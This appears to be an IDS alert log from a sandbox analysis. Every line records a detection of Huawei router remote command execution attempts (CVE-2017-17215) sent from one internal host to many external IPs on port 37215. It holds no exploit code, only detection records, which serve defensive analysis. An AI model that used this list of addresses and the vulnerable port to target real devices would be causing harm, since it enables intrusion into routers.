                                            06/14/24-10:43:36.705589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4445037215192.168.2.1441.90.65.244
                                            06/14/24-10:44:35.180054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505037215192.168.2.14156.119.248.142
                                            06/14/24-10:44:02.365813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4415037215192.168.2.14197.216.234.10
                                            06/14/24-10:44:12.646687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258637215192.168.2.14156.68.174.209
                                            06/14/24-10:43:58.293534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401637215192.168.2.14197.75.27.89
                                            06/14/24-10:44:06.451276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4783237215192.168.2.14197.238.83.69
                                            06/14/24-10:43:48.032120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456637215192.168.2.14197.95.191.67
                                            06/14/24-10:43:48.032487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5548637215192.168.2.1441.117.89.203
                                            06/14/24-10:43:50.073245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246037215192.168.2.1441.25.69.12
                                            06/14/24-10:44:33.132438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3290037215192.168.2.1441.28.72.187
                                            06/14/24-10:44:14.681507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6034237215192.168.2.1441.76.200.171
                                            06/14/24-10:44:20.806754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327637215192.168.2.1441.9.206.250
                                            06/14/24-10:44:02.383555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211237215192.168.2.14197.195.0.218
                                            06/14/24-10:44:10.549458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258237215192.168.2.14197.234.20.217
                                            06/14/24-10:44:06.471118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128437215192.168.2.1441.231.230.175
                                            06/14/24-10:44:16.735971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397437215192.168.2.14197.29.165.134
                                            06/14/24-10:44:18.777558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4994837215192.168.2.1441.85.199.145
                                            06/14/24-10:44:04.405640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785637215192.168.2.14197.209.211.133
                                            06/14/24-10:44:33.132515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481237215192.168.2.1441.11.227.31
                                            06/14/24-10:44:06.470804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3638437215192.168.2.1441.113.186.94
                                            06/14/24-10:44:00.322805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059037215192.168.2.14156.199.144.65
                                            06/14/24-10:44:20.829390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445637215192.168.2.14197.174.155.216
                                            06/14/24-10:44:29.023358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906237215192.168.2.1441.44.106.18
                                            06/14/24-10:43:41.848576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057237215192.168.2.14156.39.180.25
                                            06/14/24-10:43:56.227807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724837215192.168.2.1441.169.209.110
                                            06/14/24-10:44:29.013420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377037215192.168.2.14156.17.252.141
                                            06/14/24-10:44:08.504116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025437215192.168.2.1441.56.40.28
                                            06/14/24-10:44:04.423369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414837215192.168.2.14197.32.31.254
                                            06/14/24-10:43:36.726207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284437215192.168.2.14156.179.254.134
                                            06/14/24-10:43:41.845959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3502437215192.168.2.14197.12.252.127
                                            06/14/24-10:43:36.704863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695837215192.168.2.14156.13.229.147
                                            06/14/24-10:43:39.813243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694837215192.168.2.14156.61.37.74
                                            06/14/24-10:43:36.725704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362237215192.168.2.14156.125.205.77
                                            06/14/24-10:44:06.451912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3918037215192.168.2.14197.175.223.174
                                            06/14/24-10:44:14.687170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155437215192.168.2.14156.46.172.6
                                            06/14/24-10:43:34.676607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073037215192.168.2.14156.74.213.254
                                            06/14/24-10:44:06.453282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166037215192.168.2.1441.69.198.20
                                            06/14/24-10:44:12.640901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5004837215192.168.2.1441.222.7.46
                                            06/14/24-10:44:00.343695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766237215192.168.2.1441.238.91.165
                                            06/14/24-10:43:54.201610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331037215192.168.2.14156.161.11.244
                                            06/14/24-10:44:14.688316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6023037215192.168.2.14156.40.167.119
                                            06/14/24-10:43:41.897085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3585437215192.168.2.14197.87.208.213
                                            06/14/24-10:44:22.880306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644637215192.168.2.14197.141.96.180
                                            06/14/24-10:44:00.325491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4879637215192.168.2.14197.199.247.33
                                            06/14/24-10:44:02.367980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608637215192.168.2.1441.186.219.46
                                            06/14/24-10:43:48.028201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513637215192.168.2.1441.198.105.153
                                            06/14/24-10:44:22.860490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392237215192.168.2.14156.84.184.32
                                            06/14/24-10:44:24.914318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960037215192.168.2.14156.105.236.126
                                            06/14/24-10:43:54.184370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779037215192.168.2.14197.140.145.219
                                            06/14/24-10:44:04.420753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062037215192.168.2.1441.176.225.145
                                            06/14/24-10:44:20.804374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3517837215192.168.2.14197.175.244.54
                                            06/14/24-10:43:34.663289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252037215192.168.2.1441.169.58.138
                                            06/14/24-10:43:56.227499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511837215192.168.2.1441.179.201.187
                                            06/14/24-10:44:20.804177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5308037215192.168.2.14197.238.230.210
                                            06/14/24-10:43:54.184440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4678837215192.168.2.14197.130.1.193
                                            06/14/24-10:43:58.275558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524437215192.168.2.1441.27.137.195
                                            06/14/24-10:43:34.661122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598637215192.168.2.14156.97.90.225
                                            06/14/24-10:44:24.913468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849837215192.168.2.1441.254.171.189
                                            06/14/24-10:43:48.032025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140237215192.168.2.1441.47.114.162
                                            06/14/24-10:44:31.081959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842637215192.168.2.14156.191.140.153
                                            06/14/24-10:44:08.502528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994037215192.168.2.1441.92.214.30
                                            06/14/24-10:43:39.789027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974837215192.168.2.14156.5.45.169
                                            06/14/24-10:43:34.661100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318637215192.168.2.1441.68.188.191
                                            06/14/24-10:44:04.423005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3928237215192.168.2.1441.135.20.37
                                            06/14/24-10:43:45.984714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567237215192.168.2.14156.143.11.201
                                            06/14/24-10:44:22.859093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689637215192.168.2.14156.188.17.135
                                            06/14/24-10:44:06.451813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3637437215192.168.2.14197.15.199.30
                                            06/14/24-10:44:16.718808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748637215192.168.2.14156.28.129.222
                                            06/14/24-10:44:29.012766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197037215192.168.2.14197.246.188.151
                                            06/14/24-10:44:04.411554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474037215192.168.2.14197.6.177.187
                                            06/14/24-10:43:54.186314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5480437215192.168.2.1441.57.166.242
                                            06/14/24-10:44:14.666223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729437215192.168.2.14156.117.92.240
                                            06/14/24-10:44:33.133975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566637215192.168.2.1441.178.32.95
                                            06/14/24-10:43:43.944794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756237215192.168.2.14197.176.130.138
                                            06/14/24-10:44:00.326413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827237215192.168.2.14156.19.77.42
                                            06/14/24-10:44:14.666442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187237215192.168.2.1441.23.53.214
                                            06/14/24-10:43:37.759163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038837215192.168.2.1441.73.4.229
                                            06/14/24-10:44:02.365636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018637215192.168.2.14197.89.252.121
                                            06/14/24-10:44:20.828153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735837215192.168.2.1441.208.241.117
                                            06/14/24-10:43:45.969565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631637215192.168.2.14156.100.41.193
                                            06/14/24-10:43:50.111055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3487237215192.168.2.1441.203.141.46
                                            06/14/24-10:43:48.042534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5448637215192.168.2.14197.163.15.209
                                            06/14/24-10:44:08.504328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912037215192.168.2.14197.126.1.195
                                            06/14/24-10:43:52.146419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160837215192.168.2.14156.142.78.58
                                            06/14/24-10:44:14.669882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713437215192.168.2.14156.226.5.126
                                            06/14/24-10:43:37.761948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565437215192.168.2.1441.67.52.19
                                            06/14/24-10:43:58.276795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136637215192.168.2.14156.137.186.66
                                            06/14/24-10:44:02.367404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4304837215192.168.2.1441.85.213.235
                                            06/14/24-10:43:45.991510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729037215192.168.2.14197.39.51.26
                                            06/14/24-10:44:22.860682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039237215192.168.2.1441.151.85.42
                                            06/14/24-10:44:20.830105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794237215192.168.2.14197.18.159.169
                                            06/14/24-10:44:24.917498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3823437215192.168.2.14197.172.20.138
                                            06/14/24-10:43:36.704046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204637215192.168.2.1441.147.3.74
                                            06/14/24-10:43:52.163621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887237215192.168.2.14156.181.63.184
                                            06/14/24-10:43:36.699588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3385837215192.168.2.1441.248.249.197
                                            06/14/24-10:44:06.452262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4499637215192.168.2.14197.235.50.41
                                            06/14/24-10:44:24.915779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913237215192.168.2.14156.215.19.197
                                            06/14/24-10:44:18.777845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658037215192.168.2.14156.247.120.161
                                            06/14/24-10:43:56.225793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5404237215192.168.2.14197.254.228.190
                                            06/14/24-10:44:18.778939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342437215192.168.2.14197.2.89.94
                                            06/14/24-10:43:36.701496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066437215192.168.2.1441.5.79.61
                                            06/14/24-10:43:58.275159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4502837215192.168.2.1441.144.79.112
                                            06/14/24-10:44:27.000335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819437215192.168.2.14197.162.18.172
                                            06/14/24-10:43:39.813102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619037215192.168.2.1441.156.151.91
                                            06/14/24-10:44:14.668018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4495437215192.168.2.1441.106.77.71
                                            06/14/24-10:44:35.179376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653037215192.168.2.14156.94.186.64
                                            06/14/24-10:44:00.339083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098037215192.168.2.1441.36.106.50
                                            06/14/24-10:43:48.019805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688037215192.168.2.14156.98.140.130
                                            06/14/24-10:44:22.860959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5543037215192.168.2.14197.200.195.201
                                            06/14/24-10:44:22.861437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810837215192.168.2.1441.183.230.102
                                            06/14/24-10:44:02.366623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021837215192.168.2.14197.93.43.242
                                            06/14/24-10:44:22.878966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4878037215192.168.2.14197.86.188.21
                                            06/14/24-10:44:22.881472TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112837215192.168.2.14156.110.180.28
                                            06/14/24-10:44:31.057425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294437215192.168.2.14156.130.21.87
                                            06/14/24-10:44:00.322548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222637215192.168.2.14156.140.58.139
                                            06/14/24-10:44:33.152277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316637215192.168.2.14156.47.78.36
                                            06/14/24-10:44:14.670427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945637215192.168.2.14197.130.236.42
                                            06/14/24-10:43:54.200747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5337437215192.168.2.1441.173.186.230
                                            06/14/24-10:43:50.112279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568037215192.168.2.14197.226.228.122
                                            06/14/24-10:43:43.943873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197837215192.168.2.14156.60.78.102
                                            06/14/24-10:44:08.504494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120837215192.168.2.14197.81.194.242
                                            06/14/24-10:44:04.420275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5362237215192.168.2.14156.230.115.249
                                            06/14/24-10:44:10.546227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826237215192.168.2.14156.20.114.61
                                            06/14/24-10:44:14.689197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414037215192.168.2.1441.135.240.102
                                            06/14/24-10:44:29.027772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494037215192.168.2.1441.13.145.200
                                            06/14/24-10:43:36.704463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4448637215192.168.2.14156.83.121.141
                                            06/14/24-10:44:02.369098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641237215192.168.2.14156.154.20.19
                                            06/14/24-10:44:22.860718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960637215192.168.2.14156.199.142.75
                                            06/14/24-10:43:37.761094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725237215192.168.2.14156.105.127.137
                                            06/14/24-10:44:35.181569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748437215192.168.2.14156.105.33.216
                                            06/14/24-10:44:35.182527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849437215192.168.2.14156.195.57.115
                                            06/14/24-10:43:56.224720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085037215192.168.2.1441.95.7.194
                                            06/14/24-10:44:26.979617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3311237215192.168.2.14156.170.67.218
                                            06/14/24-10:43:56.227756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825837215192.168.2.14197.87.11.21
                                            06/14/24-10:44:02.365748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5180437215192.168.2.14156.105.14.201
                                            06/14/24-10:43:48.029828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3656037215192.168.2.1441.94.33.14
                                            06/14/24-10:44:00.321655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5976837215192.168.2.14156.136.245.105
                                            06/14/24-10:43:43.968693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574237215192.168.2.1441.14.111.33
                                            06/14/24-10:44:06.450387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4039237215192.168.2.14197.232.37.75
                                            06/14/24-10:43:50.073634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701437215192.168.2.14156.134.131.45
                                            06/14/24-10:43:52.146878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359437215192.168.2.1441.58.242.133
                                            06/14/24-10:43:41.848893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4750837215192.168.2.14197.173.38.24
                                            06/14/24-10:44:20.829008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3971037215192.168.2.1441.236.12.53
                                            06/14/24-10:44:10.568347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000437215192.168.2.14197.27.63.2
                                            06/14/24-10:44:31.085265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5747637215192.168.2.14197.25.177.65
                                            06/14/24-10:44:20.807275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4355637215192.168.2.1441.243.93.185
                                            06/14/24-10:43:39.791885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725437215192.168.2.14156.171.109.104
                                            06/14/24-10:43:50.071921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5763237215192.168.2.14156.145.246.150
                                            06/14/24-10:43:36.703533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5606837215192.168.2.1441.235.16.172
                                            06/14/24-10:43:34.677881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4979837215192.168.2.14156.104.167.238
                                            06/14/24-10:44:12.614118TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4735237215192.168.2.1441.16.23.236
                                            06/14/24-10:44:02.383006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4923437215192.168.2.14197.115.37.60
                                            06/14/24-10:43:36.723313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306237215192.168.2.1441.49.236.219
                                            06/14/24-10:43:52.143270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024037215192.168.2.14156.128.215.66
                                            06/14/24-10:44:20.828251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139837215192.168.2.1441.82.15.200
                                            06/14/24-10:43:36.700495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4198037215192.168.2.14197.180.166.46
                                            06/14/24-10:43:54.201359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070037215192.168.2.1441.175.45.73
                                            06/14/24-10:44:08.519490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684637215192.168.2.1441.147.212.66
                                            06/14/24-10:43:45.966055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5710237215192.168.2.14156.56.182.207
                                            06/14/24-10:44:31.054602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600837215192.168.2.14156.216.209.157
                                            06/14/24-10:44:24.916575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5646837215192.168.2.14197.105.173.39
                                            06/14/24-10:44:29.023054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536037215192.168.2.1441.220.189.104
                                            06/14/24-10:43:52.146127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579837215192.168.2.14197.184.32.94
                                            06/14/24-10:44:10.567550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775037215192.168.2.14156.152.84.34
                                            06/14/24-10:44:04.412248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926637215192.168.2.14197.98.198.9
                                            06/14/24-10:44:04.410798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434637215192.168.2.14156.216.94.201
                                            06/14/24-10:44:06.453201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624437215192.168.2.1441.252.146.47
                                            06/14/24-10:44:33.151795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286437215192.168.2.1441.193.211.115
                                            06/14/24-10:43:56.229886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965037215192.168.2.14197.249.216.45
                                            06/14/24-10:44:18.779891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063237215192.168.2.14197.215.37.147
                                            06/14/24-10:44:22.860637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797837215192.168.2.14197.90.131.125
                                            06/14/24-10:44:26.985738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006637215192.168.2.14197.209.200.110
                                            06/14/24-10:44:16.716765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117637215192.168.2.14156.163.26.122
                                            06/14/24-10:43:39.813311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628437215192.168.2.1441.160.145.89
                                            06/14/24-10:44:20.806558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292437215192.168.2.14197.127.161.42
                                            06/14/24-10:44:31.086249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375437215192.168.2.14197.112.71.219
                                            06/14/24-10:43:39.811399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190237215192.168.2.14197.139.209.224
                                            06/14/24-10:43:54.199888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5624837215192.168.2.1441.142.55.25
                                            06/14/24-10:43:56.228162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160637215192.168.2.14156.83.238.127
                                            06/14/24-10:44:04.405275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4185037215192.168.2.14156.244.149.112
                                            06/14/24-10:44:31.054318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297037215192.168.2.14156.88.211.2
                                            06/14/24-10:43:52.148764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527437215192.168.2.14156.134.87.80
                                            06/14/24-10:44:08.504222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826037215192.168.2.14197.62.59.62
                                            06/14/24-10:44:26.980305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4509437215192.168.2.14197.215.245.175
                                            06/14/24-10:43:36.704960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3608637215192.168.2.14156.152.18.16
                                            06/14/24-10:44:08.517362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5759437215192.168.2.14156.164.146.165
                                            06/14/24-10:44:26.985644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4888637215192.168.2.1441.128.132.191
                                            06/14/24-10:43:52.149474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4501037215192.168.2.14197.137.212.68
